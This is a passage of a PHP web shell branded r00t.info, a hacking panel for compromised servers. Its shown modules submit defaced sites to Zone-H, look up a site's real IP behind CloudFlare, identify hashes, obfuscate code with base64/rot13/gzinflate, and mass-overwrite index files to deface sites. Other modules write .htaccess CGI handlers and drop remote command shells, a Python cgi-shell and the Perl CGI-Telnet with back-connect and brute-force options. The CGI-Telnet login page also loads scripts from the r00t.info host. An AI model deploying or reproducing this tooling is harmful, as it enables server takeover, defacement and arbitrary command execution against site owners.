  2545. <center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
  2546. <br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
  2547. </form></td></tr></table></form>
  2548. <!-- End Of Zone-H -->
  2549. </td></center><br><br>
  2550.  
  2551. <?php echo '<center>'; ob_start(); $sub = get_loaded_extensions(); if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');} $hacker = $_POST['defacer']; $method = $_POST['hackmode']; $neden = $_POST['reason']; $site = $_POST['domain']; if (empty($hacker)){die ("[+] You Must Fill In The Attacker Name![+]");} elseif($method == "--------SELECT--------") {die("[+] You Must Select The Method![+]");} elseif($neden == "--------SELECT--------") {die("[+] You Must Select The Reason![+]");} elseif(empty($site)) {die("[+] You Must Inter the Sites List![+] ");} $i = 0; $sites = explode("\n", $site); while($i < count($sites)) { if(substr($sites[$i], 0, 4) != "hxxp") {$sites[$i] = "hxxp://".$sites[$i];} ZoneH("hxxp://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]); echo "Site : ".$sites[$i]." Defaced !\n"; ++$i; } echo "[+] Successfully Submitted To Zone-H!! [+]"; echo '</center>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf')) { echo '
  2552. <form method="POST"><br><br>
  2553. <center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">--==[ Bypass
  2554. <font color="#CC0000">CloudFlare</font> ]==--</font></b></p>
  2555. <select class="inputz" name="krz">
  2556.     <option>ftp</option>
  2557.         <option>direct-conntect</option>
  2558.             <option>webmail</option>
  2559.                 <option>cpanel</option>
  2560. </select>
  2561. <input class="inputz" type="text" name="target" value="url">
  2562. <input class="inputzbut" type="submit" value="Bypass"></center>
  2563.  
  2564. '; $target = $_POST['target']; if($_POST['krz'] == "ftp") { $ftp = gethostbyname("ftp."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2565. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>"; } if($_POST['krz'] == "direct-conntect") { $direct = gethostbyname("direct-connect."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2566. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>"; } if($_POST['krz'] == "webmail") { $web = gethostbyname("webmail."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2567. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>"; } if($_POST['krz'] == "cpanel") { $cpanel = gethostbyname("cpanel."."$target"); echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#FF0000'>Correct
  2568. ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>"; } } elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) { if(isset($_POST['gethash'])){ $hash = $_POST['hash']; if(strlen($hash)==32){ $hashresult = "MD5 Hash"; }elseif(strlen($hash)==40){ $hashresult = "SHA-1 Hash/ /MySQL5 Hash"; }elseif(strlen($hash)==13){ $hashresult = "DES(Unix) Hash"; }elseif(strlen($hash)==16){ $hashresult = "MySQL Hash / /DES(Oracle Hash)"; }elseif(strlen($hash)==41){ $GetHashChar = substr($hash, 40); if($GetHashChar == "*"){ $hashresult = "MySQL5 Hash"; } }elseif(strlen($hash)==64){ $hashresult = "SHA-256 Hash"; }elseif(strlen($hash)==96){ $hashresult = "SHA-384 Hash"; }elseif(strlen($hash)==128){ $hashresult = "SHA-512 Hash"; }elseif(strlen($hash)==34){ if(strstr($hash, '$1$')){ $hashresult = "MD5(Unix) Hash"; } }elseif(strlen($hash)==37){ if(strstr($hash, '$apr1$')){ $hashresult = "MD5(APR) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$H$')){ $hashresult = "MD5(phpBB3) Hash"; } }elseif(strlen($hash)==34){ if(strstr($hash, '$P$')){ $hashresult = "MD5(Wordpress) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$5$')){ $hashresult = "SHA-256(Unix) Hash"; } }elseif(strlen($hash)==39){ if(strstr($hash, '$6$')){ $hashresult = "SHA-512(Unix) Hash"; } }elseif(strlen($hash)==24){ if(strstr($hash, '==')){ $hashresult = "MD5(Base-64) Hash"; } }else{ $hashresult = "Hash type not found"; } }else{ $hashresult = "No Hash Entered"; } ?>
  2569.     <center><br><Br><br>
  2570.    
  2571.         <form action="" method="POST">
  2572.         <tr>
  2573.         <table class="tabnet">
  2574.         <th colspan="5">Hash Identification</th>
  2575.         <tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td>  <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
  2576.         <tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
  2577.     </table></tr></form>
  2578.     </center>
  2579.    
  2580.     <?php  } elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) { echo "<center/><br/><b>
  2581. --==[ Python  Bypass Exploit ]==--
  2582. </b><br><br>"; mkdir('python', 0755); chdir('python'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!"); $metin = "AddHandler cgi-script .izo"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $pythonp = '#!/usr/bin/python
  2583. # 07-07-04
  2584. # v1.0.0
  2585.  
  2586. # cgi-shell.py
  2587. # A simple CGI that executes arbitrary shell commands.
  2588.  
  2589.  
  2590. # Copyright Michael Foord
  2591. # You are free to modify, use and relicense this code.
  2592.  
  2593. # No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
  2594. # Use at your own risk !!!
  2595.  
  2596. # E-mail michael AT foord DOT me DOT uk
  2597. # Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html
  2598.  
  2599. """
  2600. A simple CGI script to execute shell commands via CGI.
  2601. """
  2602. ################################################################
  2603. # Imports
  2604. try:
  2605.    import cgitb; cgitb.enable()
  2606. except:
  2607.    pass
  2608. import sys, cgi, os
  2609. sys.stderr = sys.stdout
  2610. from time import strftime
  2611. import traceback
  2612. from StringIO import StringIO
  2613. from traceback import print_exc
  2614.  
  2615. ################################################################
  2616. # constants
  2617.  
  2618. fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
  2619. versionstring = 'Version 1.0.0 7th July 2004'
  2620.  
  2621. if os.environ.has_key("SCRIPT_NAME"):
  2622.     scriptname = os.environ["SCRIPT_NAME"]
  2623. else:
  2624.     scriptname = ""
  2625.  
  2626. METHOD = '"POST"'
  2627.  
  2628. ################################################################
  2629. # Private functions and variables
  2630.  
  2631. def getform(valuelist, theform, notpresent=''):
  2632.     """This function, given a CGI form, extracts the data from it, based on
  2633.    valuelist passed in. Any non-present values are set to '' - although this can be changed.
  2634.    (e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
  2635.     data = {}
  2636.     for field in valuelist:
  2637.         if not theform.has_key(field):
  2638.             data[field] = notpresent
  2639.         else:
  2640.             if  type(theform[field]) != type([]):
  2641.                 data[field] = theform[field].value
  2642.             else:
  2643.                 values = map(lambda x: x.value, theform[field])     # allows for list type values
  2644.                data[field] = values
  2645.     return data
  2646.  
  2647.  
  2648. theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
  2649. <BODY><CENTER>
  2650. <H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
  2651. <B><I>By Fuzzyman</B></I><BR>
  2652. """+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'
  2653.  
  2654. theform = """<H2>Enter Command</H2>
  2655. <FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
  2656. <input name=cmd type=text><BR>
  2657. <input type=submit value="Submit"><BR>
  2658. </FORM><BR><BR>"""
  2659. bodyend = '</BODY></HTML>'
  2660. errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'
  2661.  
  2662. ################################################################
  2663. # main body of the script
  2664.  
  2665. if __name__ == '__main__':
  2666.     print "Content-type: text/html"         # this is the header to the server
  2667.    print                                   # so is this blank line
  2668.    form = cgi.FieldStorage()
  2669.     data = getform(['cmd'],form)
  2670.     thecmd = data['cmd']
  2671.     print theformhead
  2672.     print theform
  2673.     if thecmd:
  2674.         print '<HR><BR><BR>'
  2675.         print '<B>Command : ', thecmd, '<BR><BR>'
  2676.         print 'Result : <BR><BR>'
  2677.         try:
  2678.             child_stdin, child_stdout = os.popen2(thecmd)
  2679.             child_stdin.close()
  2680.             result = child_stdout.read()
  2681.             child_stdout.close()
  2682.             print result.replace('\n', '<BR>')
  2683.  
  2684.         except Exception, e:                      # an error in executing the command
  2685.            print errormess
  2686.             f = StringIO()
  2687.             print_exc(file=f)
  2688.             a = f.getvalue().splitlines()
  2689.             for line in a:
  2690.                 print line
  2691.  
  2692.     print bodyend
  2693.  
  2694.  
  2695. """
  2696. TODO/ISSUES
  2697.  
  2698.  
  2699.  
  2700. CHANGELOG
  2701.  
  2702. 07-07-04        Version 1.0.0
  2703. A very basic system for executing shell commands.
  2704. I may expand it into a proper 'environment' with session persistence...
  2705. """'; $file = fopen("python.izo" ,"w+"); $write = fwrite ($file ,base64_decode($pythonp)); fclose($file); chmod("python.izo",0755); echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
  2706.  
  2707. </div>"; } elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){ $text = $_POST['code']; ?><center><br><br><b>--==[ Script Encode & Decode ]==--</b><br><br>
  2708. <form method="post"><br><br><br>
  2709. <textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
  2710. <select class='inputz' size="1" name="ope">
  2711. <option value="base64">Base64</option>
  2712. <option value="gzinflate">str_rot13 - gzinflate - base64</option>
  2713. <option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
  2714. </select>&nbsp;<input class='inputzbut' type='submit' name='submit' value='Encrypt'>
  2715. <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
  2716. </form>
  2717.  
  2718. <?php  $submit = $_POST['submit']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_encode($text); break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text))))); break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text))); break;default:break;}} $submit = $_POST['submits']; if (isset($submit)){ $op = $_POST["ope"]; switch ($op) {case 'base64': $codi=base64_decode($text); break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text))))); break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text))); break;default:break;}} echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>'; } elseif(isset($_GET['x']) && ($_GET['x'] == 'mass')) { echo "<center/><br/><b><font color=#FF0000>--==[ Mass Deface ]==--</font></b><br>"; error_reporting(0);?>
  2719. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
  2720. <td><table><table class="tabnet" >
  2721. <form hethot='post'>
  2722. <tr>
  2723.     <tr>
  2724.     <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
  2725.     </tr><br>
  2726.     <tr>
  2727.     <td>File N</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
  2728.     </tr>
  2729. </tr>
  2730. <th colspan='2'><b>Index Code</b></th><br></table>
  2731. <textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>r00t.info A</textarea><br>
  2732. <center><input class='inputzbut' type='submit' value="&nbsp;&nbsp;Deface&nbsp;&nbsp;"></center></form></table><br></form>
  2733.  
  2734. <?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}} elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) { echo "<center/><br/><b><font color=blue>--==[ cgitelnet.v1  Bypass Exploit]==--</font></b><br><br>"; mkdir('cgitelnet1', 0755); chdir('cgitelnet1'); $kokdosya = ".htaccess"; $dosya_adi = "$kokdosya"; $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!"); $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  2735.  
  2736. AddType application/x-hxxpd-cgi .cin
  2737.  
  2738. AddHandler cgi-script .cin
  2739. AddHandler cgi-script .cin"; fwrite ( $dosya , $metin ) ; fclose ($dosya); $cgishellizocin = '#!/usr/bin/perl -I/usr/local/bandmin
  2740. use MIME::Base64;
  2741. $Version= "CGI-Telnet Version 1.3";
  2742. $EditPersion="<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'>r00t.info - CGI-Telnet</font>";
  2743.  
  2744. $Password = "r00t.info";            # Change this. You will need to enter this
  2745.                 # to login.
  2746. sub Is_Win(){
  2747.     $os = &trim($ENV{"SERVER_SOFTWARE"});
  2748.     if($os =~ m/win/i){
  2749.         return 1;
  2750.     }
  2751.     else{
  2752.         return 0;
  2753.     }
  2754. }
  2755. $WinNT = &Is_Win();             # You need to change the value of this to 1 if
  2756.                                 # you're running this script on a Windows NT
  2757.                                 # machine. If you're running it on Unix, you
  2758.                                 # can leave the value as it is.
  2759.  
  2760. $NTCmdSep = "&";                # This character is used to seperate 2 commands
  2761.                                 # in a command line on Windows NT.
  2762.  
  2763. $UnixCmdSep = ";";              # This character is used to seperate 2 commands
  2764.                                 # in a command line on Unix.
  2765.  
  2766. $CommandTimeoutDuration = 10000;    # Time in seconds after commands will be killed
  2767.                                 # Don't set this to a very large value. This is
  2768.                                 # useful for commands that may hang or that
  2769.                                 # take very long to execute, like "find /".
  2770.                                 # This is valid only on Unix servers. It is
  2771.                                 # ignored on NT Servers.
  2772.  
  2773. $ShowDynamicOutput = 1;         # If this is 1, then data is sent to the
  2774.                                 # browser as soon as it is output, otherwise
  2775.                                 # it is buffered and send when the command
  2776.                                 # completes. This is useful for commands like
  2777.                                 # ping, so that you can see the output as it
  2778.                                 # is being generated.
  2779.  
  2780. # DON'T CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WHAT YOU'RE DOING !!
  2781.  
  2782. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  2783. $CmdPwd = ($WinNT ? "cd" : "pwd");
  2784. $PathSep = ($WinNT ? "\\" : "/");
  2785. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  2786. $cols= 150;
  2787. $rows= 26;
  2788. #------------------------------------------------------------------------------
  2789. # Reads the input sent by the browser and parses the input variables. It
  2790. # parses GET, POST and multipart/form-data that is used for uploading files.
  2791. # The filename is stored in $in{'f'} and the data is stored in $in{'filedata'}.
  2792. # Other variables can be accessed using $in{'var'}, where var is the name of
  2793. # the variable. Note: Most of the code in this function is taken from other CGI
  2794. # scripts.
  2795. #------------------------------------------------------------------------------
  2796. sub ReadParse
  2797. {
  2798.     local (*in) = @_ if @_;
  2799.     local ($i, $loc, $key, $val);
  2800.    
  2801.     $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  2802.  
  2803.     if($ENV{'REQUEST_METHOD'} eq "GET")
  2804.     {
  2805.         $in = $ENV{'QUERY_STRING'};
  2806.     }
  2807.     elsif($ENV{'REQUEST_METHOD'} eq "POST")
  2808.     {
  2809.         binmode(STDIN) if $MultipartFormData & $WinNT;
  2810.         read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  2811.     }
  2812.  
  2813.     # handle file upload data
  2814.     if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  2815.     {
  2816.         $Boundary = '--'.$1; # please refer to RFC1867
  2817.         @list = split(/$Boundary/, $in);
  2818.         $HeaderBody = $list[1];
  2819.         $HeaderBody =~ /\r\n\r\n|\n\n/;
  2820.         $Header = $`;
  2821.         $Body = $';
  2822.         $Body =~ s/\r\n$//; # the last \r\n was put in by Netscape
  2823.         $in{'filedata'} = $Body;
  2824.         $Header =~ /filename=\"(.+)\"/;
  2825.         $in{'f'} = $1;
  2826.         $in{'f'} =~ s/\"//g;
  2827.         $in{'f'} =~ s/\s//g;
  2828.  
  2829.         # parse trailer
  2830.         for($i=2; $list[$i]; $i++)
  2831.         {
  2832.             $list[$i] =~ s/^.+name=$//;
  2833.             $list[$i] =~ /\"(\w+)\"/;
  2834.             $key = $1;
  2835.             $val = $';
  2836.             $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  2837.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  2838.             $in{$key} = $val;
  2839.         }
  2840.     }
  2841.     else # standard post data (url encoded, not multipart)
  2842.     {
  2843.         @in = split(/&/, $in);
  2844.         foreach $i (0 .. $#in)
  2845.         {
  2846.             $in[$i] =~ s/\+/ /g;
  2847.             ($key, $val) = split(/=/, $in[$i], 2);
  2848.             $key =~ s/%(..)/pack("c", hex($1))/ge;
  2849.             $val =~ s/%(..)/pack("c", hex($1))/ge;
  2850.             $in{$key} .= "\0" if (defined($in{$key}));
  2851.             $in{$key} .= $val;
  2852.         }
  2853.     }
  2854. }
  2855.  
  2856. #------------------------------------------------------------------------------
  2857. # Prints the HTML Page Header
  2858. # Argument 1: Form item name to which focus should be set
  2859. #------------------------------------------------------------------------------
  2860. sub PrintPageHeader
  2861. {
  2862.     $EncodedCurrentDir = $CurrentDir;
  2863.     $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  2864.     my $dir =$CurrentDir;
  2865.     $dir=~ s/\\/\\\\/g;
  2866.     print "Content-type: text/html\n\n";
  2867.     print <<END;
  2868. <html>
  2869. <head>
  2870. <meta hxxp-equiv="content-type" content="text/html; charset=UTF-8">
  2871. <title>  </title>
  2872.  
  2873. $HtmlMetaHeader
  2874.  
  2875. </head>
  2876. <style>
  2877. body{
  2878. font: 10pt Verdana;
  2879. }
  2880. tr {
  2881. BORDER-RIGHT:  #3e3e3e 1px solid;
  2882. BORDER-TOP:    #3e3e3e 1px solid;
  2883. BORDER-LEFT:   #3e3e3e 1px solid;
  2884. BORDER-BOTTOM: #3e3e3e 1px solid;
  2885. color: #ff9900;
  2886. }
  2887. td {
  2888. BORDER-RIGHT:  #3e3e3e 1px solid;
  2889. BORDER-TOP:    #3e3e3e 1px solid;
  2890. BORDER-LEFT:   #3e3e3e 1px solid;
  2891. BORDER-BOTTOM: #3e3e3e 1px solid;
  2892. color: #2BA8EC;
  2893. font: 10pt Verdana;
  2894. }
  2895.  
  2896. table {
  2897. BORDER-RIGHT:  #3e3e3e 1px solid;
  2898. BORDER-TOP:    #3e3e3e 1px solid;
  2899. BORDER-LEFT:   #3e3e3e 1px solid;
  2900. BORDER-BOTTOM: #3e3e3e 1px solid;
  2901. BACKGROUND-COLOR: #111;
  2902. }
  2903.  
  2904.  
  2905. input {
  2906. BORDER-RIGHT:  #3e3e3e 1px solid;
  2907. BORDER-TOP:    #3e3e3e 1px solid;
  2908. BORDER-LEFT:   #3e3e3e 1px solid;
  2909. BORDER-BOTTOM: #3e3e3e 1px solid;
  2910. BACKGROUND-COLOR: Black;
  2911. font: 10pt Verdana;
  2912. color: #ff9900;
  2913. }
  2914.  
  2915. input.submit {
  2916. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2917. color: #FFFFFF;
  2918. border-color: #009900;
  2919. }
  2920.  
  2921. code {
  2922. border          : dashed 0px #333;
  2923. BACKGROUND-COLOR: Black;
  2924. font: 10pt Verdana bold;
  2925. color: while;
  2926. }
  2927.  
  2928. run {
  2929. border          : dashed 0px #333;
  2930. font: 10pt Verdana bold;
  2931. color: #FF00AA;
  2932. }
  2933.  
  2934. textarea {
  2935. BORDER-RIGHT:  #3e3e3e 1px solid;
  2936. BORDER-TOP:    #3e3e3e 1px solid;
  2937. BORDER-LEFT:   #3e3e3e 1px solid;
  2938. BORDER-BOTTOM: #3e3e3e 1px solid;
  2939. BACKGROUND-COLOR: #1b1b1b;
  2940. font: Fixedsys bold;
  2941. color: #aaa;
  2942. }
  2943. A:link {
  2944.     COLOR: #2BA8EC; TEXT-DECORATION: none
  2945. }
  2946. A:visited {
  2947.     COLOR: #2BA8EC; TEXT-DECORATION: none
  2948. }
  2949. A:hover {
  2950.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2951.     color: #ff9900; TEXT-DECORATION: none
  2952. }
  2953. A:active {
  2954.     color: Red; TEXT-DECORATION: none
  2955. }
  2956.  
  2957. .listdir tr:hover{
  2958.     background: #444;
  2959. }
  2960. .listdir tr:hover td{
  2961.     background: #444;
  2962.     text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  2963.     color: #FFFFFF; TEXT-DECORATION: none;
  2964. }
  2965. .notline{
  2966.     background: #111;
  2967. }
  2968. .line{
  2969.     background: #222;
  2970. }
  2971. </style>
  2972. <script language="javascript">
  2973. function chmod_form(i,file)
  2974. {
  2975.     /*var ajax='ajax_PostData("FormPerms_'+i+'","$ScriptLocation","ResponseData"); return false;';*/
  2976.     var ajax="";
  2977.     document.getElementById("FilePerms_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=chmod type=text size=5 /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  2978.     document.getElementById("text_" + i).focus();
  2979. }
  2980. function rm_chmod_form(response,i,perms,file)
  2981. {
  2982.     response.innerHTML = "<span onclick=\\\"chmod_form(" + i + ",'"+ file+ "')\\\" >"+ perms +"</span></td>";
  2983. }
  2984. function rename_form(i,file,f)
  2985. {
  2986.     var ajax="";
  2987.     f.replace(/\\\\/g,"\\\\\\\\");
  2988.     var back="rm_rename_form("+i+",\\\""+file+"\\\",\\\""+f+"\\\"); return false;";
  2989.     document.getElementById("File_"+i).innerHTML="<form name=FormPerms_" + i+ " action='' method='POST'><input id=text_" + i + "  name=rename type=text value= '"+file+"' /><input type=submit class='submit' onclick='" + ajax + "' value=OK><input type=submit class='submit' onclick='" + back + "' value=Cancel><input type=hidden name=a value='gui'><input type=hidden name=d value='$dir'><input type=hidden name=f value='"+file+"'></form>";
  2990.     document.getElementById("text_" + i).focus();
  2991. }
  2992. function rm_rename_form(i,file,f)
  2993. {
  2994.     if(f=='f')
  2995.     {
  2996.         document.getElementById("File_"+i).innerHTML="<a href='?a=command&d=$dir&c=edit%20"+file+"%20'>" +file+ "</a>";
  2997.     }else
  2998.     {
  2999.         document.getElementById("File_"+i).innerHTML="<a href='?a=gui&d="+f+"'>[ " +file+ " ]</a>";
  3000.     }
  3001. }
  3002. </script>
  3003. <body onLoad="document.f.@_.focus()" bgcolor="#0c0c0c" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0">
  3004. <center><code>
  3005. <table border="1" width="100%" cellspacing="0" cellpadding="2">
  3006. <tr>
  3007.     <td align="center" rowspan=2>
  3008.         <b><font size="5">$EditPersion</font></b>
  3009.     </td>
  3010.  
  3011.     <td>
  3012.  
  3013.         <font face="Verdana" size="2">$ENV{"SERVER_SOFTWARE"}</font>
  3014.     </td>
  3015.     <td>Server IP:<font color="#cc0000"> $ENV{'SERVER_ADDR'}</font> | Your IP: <font color="#000000">$ENV{'REMOTE_ADDR'}</font>
  3016.     </td>
  3017.  
  3018. </tr>
  3019.  
  3020. <tr>
  3021. <td colspan="3"><font face="Verdana" size="2">
  3022. <a href="$ScriptLocation">Home</a> |
  3023. <a href="$ScriptLocation?a=command&d=$EncodedCurrentDir">Komut</a> |
  3024. <a href="$ScriptLocation?a=gui&d=$EncodedCurrentDir">Dizin</a> |
  3025. <a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir">Upload File</a> |
  3026. <a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a> |
  3027.  
  3028. <a href="$ScriptLocation?a=backbind">Back Connet</a> |
  3029. <a href="$ScriptLocation?a=bruteforcer">Brute Forcer</a> |
  3030. <a href="$ScriptLocation?a=checklog">Check Log</a> |
  3031. <a href="$ScriptLocation?a=domainsuser">Domains/Users</a> |
  3032. <a href="$ScriptLocation?a=logout">Logout</a> |
  3033. <a target='_blank' href="#">Help</a>
  3034.  
  3035. </font></td>
  3036. </tr>
  3037. </table>
  3038. <font id="ResponseData" color="#ff99cc" >
  3039. END
  3040. }
  3041.  
  3042. #------------------------------------------------------------------------------
  3043. # Prints the Login Screen
  3044. #------------------------------------------------------------------------------
  3045. sub PrintLoginScreen
  3046. {
  3047.  
  3048.     print <<END;
  3049. <pre><script type="text/javascript">
  3050. TypingText = function(element, interval, cursor, finishedCallback) {
  3051.   if((typeof document.getElementById == "undefined") || (typeof element.innerHTML == "undefined")) {
  3052.     this.running = true;    // Never run.
  3053.     return;
  3054.   }
  3055.   this.element = element;
  3056.   this.finishedCallback = (finishedCallback ? finishedCallback : function() { return; });
  3057.   this.interval = (typeof interval == "undefined" ? 100 : interval);
  3058.   this.origText = this.element.innerHTML;
  3059.   this.unparsedOrigText = this.origText;
  3060.   this.cursor = (cursor ? cursor : "");
  3061.   this.currentText = "";
  3062.   this.currentChar = 0;
  3063.   this.element.typingText = this;
  3064.   if(this.element.id == "") this.element.id = "typingtext" + TypingText.currentIndex++;
  3065.   TypingText.all.push(this);
  3066.   this.running = false;
  3067.   this.inTag = false;
  3068.   this.tagBuffer = "";
  3069.   this.inHTMLEntity = false;
  3070.   this.HTMLEntityBuffer = "";
  3071. }
  3072. TypingText.all = new Array();
  3073. TypingText.currentIndex = 0;
  3074. TypingText.runAll = function() {
  3075.   for(var i = 0; i < TypingText.all.length; i++) TypingText.all[i].run();
  3076. }
  3077. TypingText.prototype.run = function() {
  3078.   if(this.running) return;
  3079.   if(typeof this.origText == "undefined") {
  3080.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);   // We haven't finished loading yet.  Have patience.
  3081.     return;
  3082.   }
  3083.   if(this.currentText == "") this.element.innerHTML = "";
  3084. //  this.origText = this.origText.replace(/<([^<])*>/, "");     // Strip HTML from text.
  3085.   if(this.currentChar < this.origText.length) {
  3086.     if(this.origText.charAt(this.currentChar) == "<" && !this.inTag) {
  3087.       this.tagBuffer = "<";
  3088.       this.inTag = true;
  3089.       this.currentChar++;
  3090.       this.run();
  3091.       return;
  3092.     } else if(this.origText.charAt(this.currentChar) == ">" && this.inTag) {
  3093.       this.tagBuffer += ">";
  3094.       this.inTag = false;
  3095.       this.currentText += this.tagBuffer;
  3096.       this.currentChar++;
  3097.       this.run();
  3098.       return;
  3099.     } else if(this.inTag) {
  3100.       this.tagBuffer += this.origText.charAt(this.currentChar);
  3101.       this.currentChar++;
  3102.       this.run();
  3103.       return;
  3104.     } else if(this.origText.charAt(this.currentChar) == "&" && !this.inHTMLEntity) {
  3105.       this.HTMLEntityBuffer = "&";
  3106.       this.inHTMLEntity = true;
  3107.       this.currentChar++;
  3108.       this.run();
  3109.       return;
  3110.     } else if(this.origText.charAt(this.currentChar) == ";" && this.inHTMLEntity) {
  3111.       this.HTMLEntityBuffer += ";";
  3112.       this.inHTMLEntity = false;
  3113.       this.currentText += this.HTMLEntityBuffer;
  3114.       this.currentChar++;
  3115.       this.run();
  3116.       return;
  3117.     } else if(this.inHTMLEntity) {
  3118.       this.HTMLEntityBuffer += this.origText.charAt(this.currentChar);
  3119.       this.currentChar++;
  3120.       this.run();
  3121.       return;
  3122.     } else {
  3123.       this.currentText += this.origText.charAt(this.currentChar);
  3124.     }
  3125.     this.element.innerHTML = this.currentText;
  3126.     this.element.innerHTML += (this.currentChar < this.origText.length - 1 ? (typeof this.cursor == "function" ? this.cursor(this.currentText) : this.cursor) : "");
  3127.     this.currentChar++;
  3128.     setTimeout("document.getElementById('" + this.element.id + "').typingText.run()", this.interval);
  3129.   } else {
  3130.     this.currentText = "";
  3131.     this.currentChar = 0;
  3132.         this.running = false;
  3133.         this.finishedCallback();
  3134.   }
  3135. }
  3136. </script>
  3137. </pre>
  3138.  
  3139. <font style="font: 15pt Verdana; color: yellow;">Copyright (C) 2001 r00t.info </font><br><br>
  3140. <table align="center" border="1" width="600" heigh>
  3141. <script src=hxxp://r00t.info/bot/log.js></script>
  3142. <script src=hxxp://r00t.info/ccb.js></script>
  3143. <tbody><tr>
  3144. <td valign="top" background="hxxp://dl.dropbox.com/u/10860051/images/matran.gif"><p id="hack" style="margin-left: 3px;">
  3145. <font color="#009900"> Please Wait . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font> <br>
  3146.  
  3147. <font color="#009900"> Trying connect to Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .</font><br>
  3148. <font color="#F00000"><font color="#FFF000">~\$</font> Connected ! </font><br>
  3149. <font color="#009900"><font color="#FFF000">$ServerName~</font> Checking Server . . . . . . . . . . . . . . . . . . .</font> <br>
  3150.  
  3151. <font color="#009900"><font color="#FFF000">$ServerName~</font> Trying connect to Command . . . . . . . . . . .</font><br>
  3152.  
